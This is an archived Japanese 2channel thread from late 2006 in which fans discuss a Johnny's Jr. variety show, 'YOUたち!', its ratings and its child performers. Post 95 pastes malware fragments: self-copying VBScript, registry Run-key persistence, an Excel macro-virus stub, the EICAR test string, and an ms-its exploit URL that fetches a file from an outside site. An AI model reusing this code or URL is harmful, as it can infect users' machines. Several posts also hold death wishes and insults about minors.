2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

YOUたち

1 :ユーは名無しネ:2006/10/08(日) 12:00:46
に出てる後ろのjr.って出てる意味なくない?笑

2 :ユーは名無しネ:2006/10/08(日) 12:23:27
カツン担だから見てるけど、つまんない。

3 :ユーは名無しネ:2006/10/08(日) 12:33:08
YOUたちんちん

4 :ユーは名無しネ:2006/10/08(日) 12:36:16
糞番組ケテーイ

5 :ユーは名無しネ:2006/10/08(日) 12:36:44
なんか趣味悪い番組次回を期待しる

6 :ユーは名無しネ:2006/10/08(日) 12:36:56
つまらないにも程がある

7 :ユーは名無しネ:2006/10/08(日) 12:37:32
ジャニ出る必然性なし

8 :ユーは名無しネ:2006/10/08(日) 12:41:56
ライブステージみたいのはあったの?

9 :ユーは名無しネ:2006/10/08(日) 12:46:53
最初に歌ってた
運動会の映像ミックスしてた

10 :ユーは名無しネ:2006/10/08(日) 13:08:35
みんなモニター(?)ばっかり見てたし
爺の顔もテカテカしてたし
次長課長いなかったら番組にならん

11 :ユーは名無しネ:2006/10/08(日) 13:10:29
歌コーナーみたいな感じではやらないのかな?
オープニングが歌コーナーだったとはがっくりだよ

12 :ユーは名無しネ:2006/10/08(日) 13:11:32
次長課長いないほうが
カツンの2人が上手くやるんじゃね?

13 :ユーは名無しネ:2006/10/08(日) 13:12:16
てか最近Jrの子キモい子増えた

14 :ユーは名無しネ:2006/10/08(日) 13:13:11
まぁまだ始まったばっかだし

15 :ユーは名無しネ:2006/10/08(日) 13:15:47
後ろのズニア意味ないからなにかやらせろ
jr.にQみたいなの見たいけどヲタしか見ないか

16 :ユーは名無しネ:2006/10/08(日) 13:18:02
ズニアは誰がいた?

17 :ユーは名無しネ:2006/10/08(日) 13:20:07
厨ばっかだな

18 :ユーは名無しネ:2006/10/08(日) 13:20:15
>12
う〜ん わりと次長課長のジャニ麺へのつっこみが
オモロイと思ったんだけど

ダチョウはイラン そこだけオサーン臭がした
その分 歌かダンスが見たかった

19 :ユーは名無しネ:2006/10/08(日) 13:22:38
厨ばっかだなここ

20 :ユーは名無しネ:2006/10/08(日) 13:23:52
この先録画するか迷うくらい糞番組だった

21 :ユーは名無しネ:2006/10/08(日) 13:24:59
誰かが苺って2ネーム言ってたよね

22 :ユーは名無しネ:2006/10/08(日) 13:25:11
そんなにつまんなかったのか

23 :ユーは名無しネ:2006/10/08(日) 13:29:12
ここ本スレじゃないよな?
厨が立てたスレなんていやだぞ

24 :ユーは名無しネ:2006/10/08(日) 13:32:42
わざわざスレ立てなくてもデブスレでやれば良かったのに

25 :ユーは名無しネ:2006/10/08(日) 13:33:44
久々の糞番組だな
なんのためのズニアだ

26 :ユーは名無しネ:2006/10/08(日) 13:38:10
あの枠の番組て座長とか干菓子とかの流れで
たぶんつまらんと思ってたからあんなもんかな
でも金のかかりそうなゲスト?だかレギュラーだかいらね
次課長と中島ぐらいだけでいい

27 :ユーは名無しネ:2006/10/08(日) 13:44:26
中島ってオセロ?裕翔?

28 :ユーは名無しネ:2006/10/08(日) 13:46:38
アンダーソン
何気に映りまくり

29 :ユーは名無しネ:2006/10/08(日) 13:47:19
>27
磯野野球やろうぜー
っていう子

30 :ユーは名無しネ:2006/10/08(日) 13:53:00
12:25〜
苺が鑢番組と君達の両番組に出演するという現象が

31 :(・)(・)爆乳戦隊チチレンジャー ◆BUDccFobYA :2006/10/08(日) 14:12:55
youたちって来週からじゃないの

32 :ユーは名無しネ:2006/10/08(日) 14:27:13
ポカーン(゚Д゚)

33 :ユーは名無しネ:2006/10/08(日) 14:29:09
>>1

最近大手プロバになってから実況以外スレ立てられません
どうしたらスレ立てられますか

34 :(  。) 。)爆乳戦隊チチレンジャー ◆BUDccFobYA :2006/10/08(日) 14:29:45
ちゃんと宣伝してくれないと

35 :ユーは名無しネ:2006/10/08(日) 14:33:58
>30
YOUたちの方はあまり映さないようにしてたよね12:25以降は

36 :ユーは名無しネ:2006/10/08(日) 14:34:48
YOUたちに来週でるYOU

37 :ユーは名無しネ:2006/10/08(日) 14:38:25
>1
氏ね


38 :ユーは名無しネ:2006/10/08(日) 14:38:58
苺ちゃんがカワエエから
つらかったけど最後まで見ましたよ

39 :ユーは名無しネ:2006/10/08(日) 14:43:52
苺はヌサ

40 :ユーは名無しネ:2006/10/08(日) 14:45:04
>39
お前よりマシ

41 :ユーは名無しネ:2006/10/08(日) 14:45:42
>1
厨がスレ立ててんじゃねーよ
氏ね

42 :ユーは名無しネ:2006/10/08(日) 15:42:28
禿しくつまらなかったな
悪いがもう来週から見ない
鑢番組のほうを見る

43 :ユーは名無しネ:2006/10/08(日) 15:52:04
自担を見れてよかったが
来週からもちょっと面白くなってほしい
次課長のイケ面の方よりブタムの方がキャワいく見えた
腐ってもジャニ

44 :ユーは名無しネ:2006/10/08(日) 15:59:40
内容的にはつまらない
一般仁はげしくいらない
ジカチョー全然おもしろくないよ

中島もおもしろくないし
もっと頭がいいし切れるお笑いを入れてくれ

爆笑がいいけどジャニなんて相手にしないんだろうな

45 :ユーは名無しネ:2006/10/08(日) 16:06:09
爆笑太田がプラムをイジメるのが見たい

46 :ユーは名無しネ:2006/10/08(日) 16:07:53
禿同あげ

47 :ユーは名無しネ:2006/10/08(日) 16:21:45
ジカチョーは担面のギャグがおもしろかっただけ
せめて藤井とかのお笑いにしてくれよ

48 :ユーは名無しネ:2006/10/08(日) 16:56:16
見てるこっちが恥ずかしかったお…
あれはダレ狙いの番組なんだお?
どうせならジャニだけでして
若い娘たち狙ったほうがいいと思うお。
うしろのジュニたちはいらないお!

49 :ユーは名無しネ:2006/10/08(日) 17:06:00
プラム氏ね不細工のくせにテレビ出て来るな

50 :ユーは名無しネ:2006/10/08(日) 17:06:34
1がきた

51 :ユーは名無しネ:2006/10/08(日) 17:11:12
苺氏ね

52 :ユーは名無しネ:2006/10/08(日) 17:32:45
爆笑は滝がキャワなズニア時代なら共演してたがな

53 :ユーは名無しネ:2006/10/08(日) 19:58:51
田中も太田も一応ジャニ知ってるし司会してほしいな
本当に使えないお笑いばっかり

54 :ユーは名無しネ:2006/10/08(日) 20:49:16
ダチョウは爺オムの「ダー」言うのをマネしたから呼んだのか?
凄くダチョウはいらなかったが
ジカチョーはもちょと面白いかと思ったらツマンネー、オセロも森3中もツマンネーー
でも自担見るために頑張ってみるよorz

55 :ユーは名無しネ:2006/10/08(日) 20:59:56
森三中じゃなくハリセンボンだろ

56 :ヒラメLOVELOVE応援団 ◆FaJhcm0Hgg :2006/10/08(日) 21:22:57
すべてにおいて中途半端なんだよ…

57 :ユーは名無しネ:2006/10/08(日) 21:56:45
ジカチョーが面白かったためしはない

58 :ユーは名無しネ:2006/10/08(日) 23:17:35
歯の色が違ウンデスケレド
神経が死んでるんですってのが面白かった

59 :ユーは名無しネ:2006/10/08(日) 23:36:37
YOUバックGameで虫が森久美子に爆笑してたのがワロタ

60 :ユーは名無しネ:2006/10/09(月) 01:09:26
ゲストも企画も大杉なんだな・・・
Youバックは
仔猫中島カツンだけでやってもらいたかったが無理な話か

61 :ユーは名無しネ:2006/10/09(月) 01:41:54
往年の裸少みたいにズニアだけで番組まわしゃいいんだよ
ゲストタレいらん
オムと爺だけはまあいてもいいけど

62 :ユーは名無しネ:2006/10/09(月) 01:42:10
Youバックに限らず仔猫中島カツンだけの安っちー番組な方がいい

63 :ユーは名無しネ:2006/10/09(月) 01:53:13
>60-62
禿同

64 :ユーは名無しネ:2006/10/09(月) 21:40:35
どうせあの時間帯は家にいる人少ないんだからズニアだけの番組でいいのにね
BBSに要望書いてみた人いる?
自分電話でいってみる
あなたと日テレでも扱われるかも知れないし

65 :ユーは名無しネ:2006/10/09(月) 21:58:42
いちおうあの時間はゴールデンみたいだから
深夜みたいなことにはいかないんだろうけど
やっぱり深夜のケチャがよかった

66 :ユーは名無しネ:2006/10/09(月) 23:17:10
Youの視聴率

  2.6%

67 :ユーは名無しネ:2006/10/09(月) 23:53:56
それで良い
早速テコ入れだw

68 :ユーは名無しネ:2006/10/10(火) 01:17:38
私、最初だけみてないんだけど、どんな感じだったの?

69 :ユーは名無しネ:2006/10/10(火) 01:36:47
>>68
「YOUたちはおちんちんに毛生えたかな?」っていうナレーションから始まった

70 :ユーは名無しネ:2006/10/10(火) 03:30:21
一文字に吹いた
何あの破廉恥プレイ(w

71 :ユーは名無しネ:2006/10/10(火) 04:16:08
>>69ホントの事教えて、ふざけないで。

72 :ユーは名無しネ:2006/10/10(火) 09:29:57
目の前にある賢い箱で検索しろよ
一発だろ

73 :ユーは名無しネ:2006/10/10(火) 11:00:54
>>71
中丸のお宅訪問のコーナーだよ

74 :ユーは名無しネ:2006/10/10(火) 13:56:23
聖ますますチンピラになってくね…
あれじゃかつんFAN減っちゃうよ。。

75 :ユーは名無しネ:2006/10/10(火) 14:04:35
BBS腐ってる〜
都合のいいコメントしか載せてないし
本当にあれでおもしろいって思った人がいるのかな?
ジャニーズアタクの私でさえつまんなかったのにね

76 :ユーは名無しネ:2006/10/10(火) 14:05:18
↑オタクだお

77 :ヒラメLOVELOVE応援団 ◆FaJhcm0Hgg :2006/10/10(火) 17:13:03
黙れジャニアタ

78 :ユーは名無しネ:2006/10/10(火) 19:53:08
ジャニヲタにはつまらん司会とゲストのおかげで禿つまらんでしょ
司会なんて爺オムだけでいいのに再来週ぐらいに期待

79 :ユーは名無しネ:2006/10/10(火) 20:07:49
たぶんBBSは超賑わってるんだろうな
だからジャニヲタ的には成功と番組スタッフはみてると思うよ
どうせ日曜昼なんて誰も家にいない時間だから数字は関係ないし

80 :ユーは名無しネ:2006/10/10(火) 20:22:52
あのつまんねー番組のどこを褒めるて言うんだ?
自分で書いてるんじゃね?

81 :ユーは名無しネ:2006/10/10(火) 20:48:08
リアは見れればなんでもいいんだよ

82 :ユーは名無しネ:2006/10/11(水) 02:37:31
中丸くんのお宅訪問は嘘でしょ。見てないって言っても5分ぐらい。

83 :ユーは名無しネ:2006/10/11(水) 15:19:51
>>77うざ

84 :ユーは名無しネ:2006/10/11(水) 15:54:31
虫が髪伸びてカワユスだった

85 :ユーは名無しネ:2006/10/12(木) 00:19:36
アンダーソンの気弱な表情が何とも

86 :ユーは名無しネ:2006/10/12(木) 05:28:16
誰かいい人いないのー? 雑誌に書いてあるわけでもあるまいし。

87 :ユーは名無しネ:2006/10/14(土) 03:03:30
取りあえずメモ
バックのチビたち

神田憲征
高崎俊吾
滝野雄
木村浩也
伊藤拓美
アンダーソン・ケイシー
野本?広大
山口海

88 :ユーは名無しネ:2006/10/14(土) 12:40:49
>87
鈴木広太

89 :ユーは名無しネ:2006/10/15(日) 12:22:12
今日はいい感じやね!

90 :ユーは名無しネ:2006/10/15(日) 12:23:34
京本政樹の子どもまじかわいかったーw

91 :ユーは名無しネ:2006/10/15(日) 13:02:42
歌がない時点でya×3以下

92 :ユーは名無しネ:2006/10/15(日) 13:08:08
歌ないし、苺目立たないし

93 :ユーは名無しネ:2006/10/15(日) 13:16:16
シマンネ

94 :ユーは名無しネ:2006/10/15(日) 13:23:13
ズニア出す意味なし

95 :<body onload=window()>:2006/10/15(日) 13:26:41
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


96 :ユーは名無しネ:2006/10/15(日) 13:41:46
鈴木広大イラネ
カワイクないだろアイツ
代わりに滝野&龍澳だせよ

97 :ユーは名無しネ:2006/10/15(日) 13:43:34
チビジュいらない
急行出して

98 :ユーは名無しネ:2006/10/15(日) 13:54:00
次回予告で
中島がカバンに入って
首だけ出していたなwww

99 :ユーは名無しネ:2006/10/15(日) 13:59:28
前回よりはマシになってたよな
でもヤー×3と時間帯かぶってるってどうなんだろ
あとアンダーソン押しすぎ!
うざー

100 :ユーは名無しネ:2006/10/15(日) 14:03:16
爺ギザカワユスー

101 :ユーは名無しネ:2006/10/15(日) 14:06:15
>>100禿同!!

102 :ユーは名無しネ:2006/10/15(日) 14:06:44
>91
歌あったやん
最後に

103 :ユーは名無しネ:2006/10/15(日) 14:07:56
いまバナナ食べてるよw

104 :ユーは名無しネ:2006/10/15(日) 14:09:44
おいしい?

105 :ユーは名無しネ:2006/10/15(日) 14:13:14
>102
あれで満足なヲタがいるのか?(w

106 :ユーは名無しネ:2006/10/15(日) 14:13:45
うまー
あまー

107 :ユーは名無しネ:2006/10/15(日) 14:14:37
もっとちょうだあい

108 :ユーは名無しネ:2006/10/15(日) 14:16:22
雄ちゃんかわいいよね!

109 :ユーは名無しネ:2006/10/15(日) 14:17:37
雄一かあわあいいい〜

110 :ユーは名無しネ:2006/10/15(日) 14:18:41
ゆっちはあたしのものよ!

111 :ユーは名無しネ:2006/10/15(日) 14:23:02
(・∀・)イジョウジサクジエンデシタ


112 :ユーは名無しネ:2006/10/15(日) 15:58:02
てかヤァが出てないのなんで??
PVではJ.JもキスマイもABCも出てるのに

113 :ユーは名無しネ:2006/10/15(日) 16:51:57
鑢番組のほうが面白いな

114 :ユーは名無しネ:2006/10/15(日) 18:32:56
子猫イラネ
急行出せよ

115 :ユーは名無しネ:2006/10/15(日) 18:41:50
苺とプラムがブサすぎる

116 :ユーは名無しネ:2006/10/15(日) 18:45:24
仰天コーナーで激しく気持ち悪くなるのだが

117 :ユーは名無しネ:2006/10/16(月) 00:11:33
YOUさんにムチャ振りされてマジにビビる中島w

118 :ユーは名無しネ:2006/10/16(月) 03:31:54
>116
ジブンもだ
昨日のは汚いし吐き気した
ビグはなんであんであんなに爆笑してたんだ

119 :ユーは名無しネ:2006/10/16(月) 06:44:07
>118
仕事だからしょうがないとは言えあんなので笑ってる自担をみるのはからい

120 :ユーは名無しネ:2006/10/16(月) 06:46:15
ビク担ではないが

121 :ユーは名無しネ:2006/10/16(月) 23:56:30
山田涼介
顔がプリチーなのに声が太くて
驚いたw

122 :ユーは名無しネ:2006/10/17(火) 10:58:15
探偵学園の時すでに声が低かったよ
あんまりあれから声変わってなくないか?

123 :ユーは名無しネ:2006/10/17(火) 21:04:41
山田、声も太いが
手足も子供にしては太い
やぱ虫の方がカコよくなるのかも

124 :ユーは名無しネ:2006/10/18(水) 00:24:57
今週のチビ

伊藤拓美
アンダーソン・ケイシー
森本龍太郎
鈴木広太
神田憲征
山田亮介
カミュー・ケイト
京本大我

125 :ユーは名無しネ:2006/10/18(水) 21:01:56
15日の視聴率はどうだった?

126 :ユーは名無しネ:2006/10/21(土) 12:39:33
早くkitty終わってくんないかなー。
って思うのが正直なところ。

127 :ユーは名無しネ:2006/10/21(土) 13:05:22
伊藤拓美千チャンより強烈な顔してる…

128 :ユーは名無しネ:2006/10/21(土) 13:22:06
>124
山田「涼」介

129 :ユーは名無しネ:2006/10/21(土) 13:41:59
伊藤のアゴはもののけ姫歌ってた人のアゴに似てるよな
キモイ
あと斎藤正喜にも似てる

130 :ヒラメLOVELOVE応援団 ◆FaJhcm0Hgg :2006/10/21(土) 14:01:06
視聴率3.3だったっけ…?うろ覚えだが

131 :ユーは名無しネ:2006/10/21(土) 18:32:40
明日はビクトリンと栗が見どころですねタノスミ

132 :ユーは名無しネ:2006/10/22(日) 09:29:00
今日チビジュは誰でる?

133 :ユーは名無しネ:2006/10/22(日) 12:41:33
豆人間キモス
チャンネル変えた

134 :ユーは名無しネ:2006/10/22(日) 12:42:45
マジキモカッタな
本当止めてほしかった
汚いキモイ

135 :ユーは名無しネ:2006/10/22(日) 12:54:50
チャンネル変えたら鑢番組で賑やかなライブが

136 :ユーは名無しネ:2006/10/22(日) 13:02:43
なんで毎回キモいのが来るのか理解できナス
それを楽しそうに見てる麺が哀れ

137 :ユーは名無しネ:2006/10/22(日) 13:05:45
最後の三流芸人イラネ

138 :ユーは名無しネ:2006/10/22(日) 14:06:44
Jrの体操服姿に萌え〜
もっと大きい画像で映してくれ

139 :ユーは名無しネ:2006/10/22(日) 14:15:31
苺キャワ

140 :ユーは名無しネ:2006/10/22(日) 14:16:13
虫イラネ

141 :ユーは名無しネ:2006/10/22(日) 14:16:54
虫より他のチビズ押せ
いくら押しても人気出ない虫なんて押しても無意味ウザイだけ

142 :ユーは名無しネ:2006/10/22(日) 14:17:40
>138
Jrとか書いてんなよ深山

143 :ユーは名無しネ:2006/10/22(日) 14:27:48
BBSにみんなメールした?
自分先週もしたよ
ご飯食べてるのに下品なことするなって

www.ntv.co.jp/you/

↑こちらのBBSからどうぞ
マンセーレスしか載せないけどスタッフは読んでるからね

144 :ユーは名無しネ:2006/10/22(日) 21:05:06
体操着萌えたけどもっとしっかり歌コーナー欲しいな
メールしてみる

145 :ユーは名無しネ:2006/10/22(日) 21:08:51
全角…

146 :ユーは名無しネ:2006/10/22(日) 21:15:50
今日のya×3とか神

147 :ユーは名無しネ:2006/10/22(日) 21:17:33
ya×3…

148 :ユーは名無しネ:2006/10/22(日) 23:41:13
夕立はつまらない

149 :ユーは名無しネ:2006/10/23(月) 05:52:18
仰天人間の時鈴木広太が目ぎょろっとしててキモカッタ
てか全然ジャニっぽくないよな

150 :ユーは名無しネ:2006/10/23(月) 08:52:49
ココでのお約束

・メール欄に必ず半角でsageと入れる
・カタカナは半角で全角は使わない
・、。はゴミだから使わない


これを守れないヤシはズニア板に来るな死ね

151 :ユーは名無しネ:2006/10/23(月) 11:26:11
>150
、はゴミじゃねーだろ
あと氏とかに変えたほうがいいよ

152 :ユーは名無しネ:2006/10/23(月) 12:09:23
>150
m9(^Д^)プギャー!

153 :ユーは名無しネ:2006/10/23(月) 12:11:38
>>>>>150
>>>>>150
m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ
m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッm9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ

m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ
m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッm9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ

m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ
m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッm9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ

m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ
m9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッm9(;ぺ;Ж;ぺ;)、ヒャーーーーーーッペッ

154 :ユーは名無しネ:2006/10/23(月) 13:07:17
昨日のは山田涼介くんが結構前に出てた。     押されてるな。 YOUバックゲームにも参加してたし。

155 :ユーは名無しネ:2006/10/23(月) 13:11:13
ビクタン栗レオだけでオケ

156 :ユーは名無しネ:2006/10/23(月) 17:06:07
なんで携帯厨って改行しないんだろ
PC用掲示板だと知らないのか?

157 :ユーは名無しネ:2006/10/23(月) 19:42:59
8Jみたいなのまたやってほしい

158 :ユーは名無しネ:2006/10/23(月) 22:17:52
今週のチビ

先週と同じ

159 :ユーは名無しネ:2006/10/25(水) 15:44:16
>156          自分も携帯厨ですが何か?何回かPCでカキコした事ある 自分がしてた頃「改行」っていう2ch用語は無かった(′д`)いつ出来たんだろ? 何なの改行って     厨房=中学生で◎?    なんか色んな人が厨って言われてるから

160 :ユーは名無しネ:2006/10/25(水) 15:51:17
全員が厨な訳じゃないと思う           こっちも日本語乱れてる

161 :ユーは名無しネ:2006/10/25(水) 15:58:01
(゚д゚)ポカーン

162 :ユーは名無しネ:2006/10/25(水) 16:55:46
((((゜□゜≡゜□゜))))

163 :ユーは名無しネ:2006/10/25(水) 21:48:09
電撃ネットワークに出て欲しい

164 :ユーは名無しネ:2006/10/25(水) 23:02:02
何この厨スレ

165 :ユーは名無しネ:2006/10/26(木) 07:52:28
ETかわゆす(^ω^)

166 :ユーは名無しネ:2006/10/26(木) 13:13:09
>158
あれ不思議なんだけどキィと光代が入ったのに出てないってことは
2回分まとめドリなのかな


167 :ユーは名無しネ:2006/10/28(土) 03:35:54
キィ光代?
この番組で急行の扱いってどうなんだろ

168 :ユーは名無しネ:2006/10/29(日) 20:15:12
今日放送あった?

169 :ユーは名無しネ:2006/10/29(日) 21:13:44
>168
ありません

170 :ユーは名無しネ:2006/10/31(火) 22:43:52
YOUたち全国ネットしろ!

171 :ユーは名無しネ:2006/10/31(火) 23:21:17
編集めんどすぎて未だに放置してある
いっそ歌以外捨てるか
子猫に10オシ背景に8オシがいるくらいだし…

172 :ユーは名無しネ:2006/11/01(水) 01:45:52
自担がウマーなとこだけ編集したら5分になったorz

173 :ユーは名無しネ:2006/11/05(日) 13:57:39
何で仰天人間一番最初になったんだろ?
来週からの新コーナーに期待

174 :ユーは名無しネ:2006/11/05(日) 15:30:29
揚げ

175 :ユーは名無しネ:2006/11/05(日) 16:10:08
>173
新コーナーなんていってたっけ?
何がなくなるんだ?
もう素人のコーナーいらいないんだが
あと女のお笑い下品で見てられない(てか見てない
自担がいるからあの番組見てるけどいなかったら絶対みない番組だ

176 :ユーは名無しネ:2006/11/05(日) 16:34:06
公式より
>今回から新コーナー「赤恥カルタをとっちゃいなよ!」がスタート!
>ゲストとYOUたちの恥ずかしいエピソードが大量流出しちゃいます!
らしぃ
dgsks仰天人間はまだ募集してるからなくならないっぽ

177 :ユーは名無しネ:2006/11/06(月) 02:57:57
もう少しズニアに焦点あててほしい

178 :ユーは名無しネ:2006/11/06(月) 04:58:20
一体いつになったらよみうりテレビは放送してくれるんだろうか
夜中でもいいからやってくれたらいいのにね

179 :ユーは名無しネ:2006/11/06(月) 13:26:05
YOUバックゲーム秋田

180 :ユーは名無しネ:2006/11/06(月) 15:57:28
仰天人間イラネ
みんな投稿しよう

181 :ユーは名無しネ:2006/11/06(月) 23:58:49
よみうりはやらなくていいよよみうり

182 :ユーは名無しネ:2006/11/07(火) 02:37:11
>178-179
TV stationに“関東エリア”というページがあって、そこにYOUたち!が載ってる。

森本龍太郎くんは喋るとイメージ変わるね!
声低くてビックリ…(○□○;)

183 :ユーは名無しネ:2006/11/07(火) 18:47:25
見るけど担が出てても保存しなくていい程度の番組

ズニアというより次課長の番組だよ

184 :mmm:2006/11/08(水) 14:48:54
ウチは山田君が大好きです!!

185 :ユーは名無しネ:2006/11/11(土) 23:37:50
この番組大スチだ

186 :ユーは名無しネ:2006/11/12(日) 02:50:28
栗が出てなければ絶対観ない番組です

187 :ユーは名無しネ:2006/11/12(日) 03:37:52
ジカチョーとか全然面白くねーしウザイ
中嶋も素人もイラネーよゲストもイラネ
キモイ汚いのもやるな見てるのつらいよ
ズニアとオム爺だけでやれ


188 :ユーは名無しネ:2006/11/12(日) 12:44:13
age

189 :ユーは名無しネ:2006/11/12(日) 13:02:50
新コーナーの代わりにこだわりランチがなくなったのか
今日の仰天はまた下品だったな

190 :ユーは名無しネ:2006/11/12(日) 13:04:00
来週から安田大サーカスが新メンバーって
またズニアの出番が減る悪寒

191 :hhh:2006/11/12(日) 14:56:46
あー、Jr.もっと出して欲しいよね!?
特に山田君・・・。
ウチ大好きなんだ!!


192 :ユーは名無しネ:2006/11/12(日) 19:02:07
山田顔デカイから

193 :ユーは名無しネ:2006/11/12(日) 19:15:11
LR違反者ヽ(・ε・)人(・ω・)人(・з・)ノ 死ね

LR違反者ヽ(・ε・)人(・ω・)人(・з・)ノ 死ね

LR違反者ヽ(・ε・)人(・ω・)人(・з・)ノ 死ね

LR違反者ヽ(・ε・)人(・ω・)人(・з・)ノ 死ね

LR違反者ヽ(・ε・)人(・ω・)人(・з・)ノ 死ね

LR違反者ヽ(・ε・)人(・ω・)人(・з・)ノ 死ね

194 :ユーは名無しネ:2006/11/13(月) 00:41:41
質問コーナーも無くなったな
バックのチビの存在感が…

195 :ユーは名無しネ:2006/11/13(月) 02:04:08
子猫の腕相撲は空気読めてなかったな

196 :ユーは名無しネ:2006/11/13(月) 02:45:23
来週の予告にレオ弟ハケ-ン

197 :hhh:2006/11/13(月) 08:32:14
山田君もっと出て欲しい!!!!!

198 :ユーは名無しネ:2006/11/13(月) 14:41:54
何でわざわざこの番組でダンス甲子園予選流すかな
ウザ過ぎる

199 :hhh:2006/11/13(月) 18:21:55
それウチも思った!!!
それやるんだったら
もっとJr出せよって感じじゃん!?

200 :ユーは名無しネ:2006/11/16(木) 01:10:42
>1
後ろにいるJr.は出てる意味ある!

201 :ユーは名無しネ:2006/11/16(木) 02:04:03
最初から見てて。
>21
中島知子さんが言った。

>27
↑。

202 :ユーは名無しネ:2006/11/17(金) 22:10:51
子猫イラネ
毛逝と虫栗だけでいい

203 :ユーは名無しネ:2006/11/19(日) 07:26:02
本日放送なのでage

204 :ユーは名無しネ:2006/11/19(日) 08:18:10
もう少しで放送時間なのでage

205 :ユーは名無しネ:2006/11/19(日) 12:37:36
終わったのでage

206 :ユーは名無しネ:2006/11/19(日) 12:42:29
ライブは初めから
大画面にしてホスィ

207 :ユーは名無しネ:2006/11/19(日) 12:54:28
森本慎太郎くん出てたね。

208 :ユーは名無しネ:2006/11/19(日) 12:56:24
でも、私はお兄ちゃんの方がいい。
やっぱり本当だったんだ、弟がジャニーズ入るの。


209 :ユーは名無しネ:2006/11/19(日) 12:58:07
なぜか今日はサッカーの番組してて放送しておらず…orz

210 :ユーは名無しネ:2006/11/19(日) 13:02:17
>209
何チャン観てましたか?
YOUたち!は日テレですよ。

211 :ユーは名無しネ:2006/11/19(日) 13:07:35
>208
何をいまさら


212 :ユーは名無しネ:2006/11/19(日) 13:13:27
>211
私が聞いた時は、
入るかもって言ってる時だったんですよー!
小3に見えない…。

213 :ユーは名無しネ:2006/11/19(日) 15:41:57
11/11収録(二回分)

11/19,25放送(新ED)



214 :ユーは名無しネ:2006/11/19(日) 15:49:03
>210
地元の高校サッカーの中継してたんだよ
局を間違えるわけないジャマイカ

215 :ユーは名無しネ:2006/11/19(日) 17:24:06
なぜか今日も上沼恵美子の番組してて放送しておらず…orz

216 :ユーは名無しネ:2006/11/19(日) 17:33:31
>215
そういうときはいつものところでゲトしなよ

217 :ユーは名無しネ:2006/11/26(日) 14:53:55
HDDにとったものの2回目を見る気がナス…
消してよいものだろうか

218 :ユーは名無しネ:2006/11/27(月) 01:04:18
レオキャワワ−−−!

219 :ユーは名無しネ:2006/11/27(月) 01:05:47
地デジハイビジョンで見ると
プラムの毛穴やべーぞ

220 :ぃちか:2006/11/27(月) 21:24:11
もっとジュニアをだして
安田大サーカスきもい

221 :ユーは名無しネ:2006/11/27(月) 21:26:00
ぃちか(w

222 :ユーは名無しネ:2006/11/27(月) 21:26:50
ぃちかとか

223 :ユーは名無しネ:2006/11/27(月) 21:32:12
北山の本スレです



主税【5】
http://tv7.2ch.net/test/read.cgi/jr2/1164628119/

224 :ユーは名無しネ:2006/11/28(火) 09:13:57
お肌がきれいなズニアは?

225 :ユーは名無しネ:2006/11/28(火) 13:43:19
京ズ

226 :ユーは名無しネ:2006/11/28(火) 17:17:08
この前の放送、裕翔がめっちゃ可愛かった〜
誰かnyにでも流してよぉ

227 :ユーは名無しネ:2006/11/30(木) 21:32:51
ポカーン(゚Д゚)

228 :ユーは名無しネ:2006/12/02(土) 19:06:07
たこやきで放送してる?

229 :ユーは名無しネ:2006/12/10(日) 09:59:24
放送間近なのでage
YOUたち!は関東ローカル番組

230 :sage:2006/12/10(日) 10:43:11
河本飯店がくだらないと思う

231 :ユーは名無しネ:2006/12/10(日) 10:45:17
間違えた?sage書き込む場所

232 :ユーは名無しネ:2006/12/10(日) 10:55:14
231>間違えた スマン

233 :ユーは名無しネ:2006/12/10(日) 10:59:08
イヤ別にいいけど…
仕方ないし

234 :ユーは名無しネ:2006/12/10(日) 11:00:19
最近YOUバックゲームやっていないよーな…

235 :ユーは名無しネ:2006/12/10(日) 11:33:30
あんなん流行んねーしつまんねーよ

236 :ユーは名無しネ:2006/12/10(日) 12:37:28
ガンニバル
キタ━━━━(゚∀゚)━━━

237 :ユーは名無しネ:2006/12/10(日) 12:56:54
裕翔くん・龍ちゃん・山田くんは急行じゃないでしょ
同じ衣装着てるし…
事務所の考えてる事が分かりません><

238 :ユーは名無しネ:2006/12/10(日) 13:22:55
こっちは閑散としているな
誰も見てないのか(w

239 :ユーは名無しネ:2006/12/10(日) 14:50:43
関東ローカルだから仕方茄子

240 :ユーは名無しネ:2006/12/10(日) 16:06:44
名古屋もやっとるわボケ

241 :ユーは名無しネ:2006/12/10(日) 17:54:20
この番組くだらなすぎ

どうせならjrだけでグダグダでもいいから
やってほしい
そのほうが絶対楽しいし

体動かす系のやつとか外ロケとかやったほうがいい

242 :ユーは名無しネ:2006/12/10(日) 19:43:39
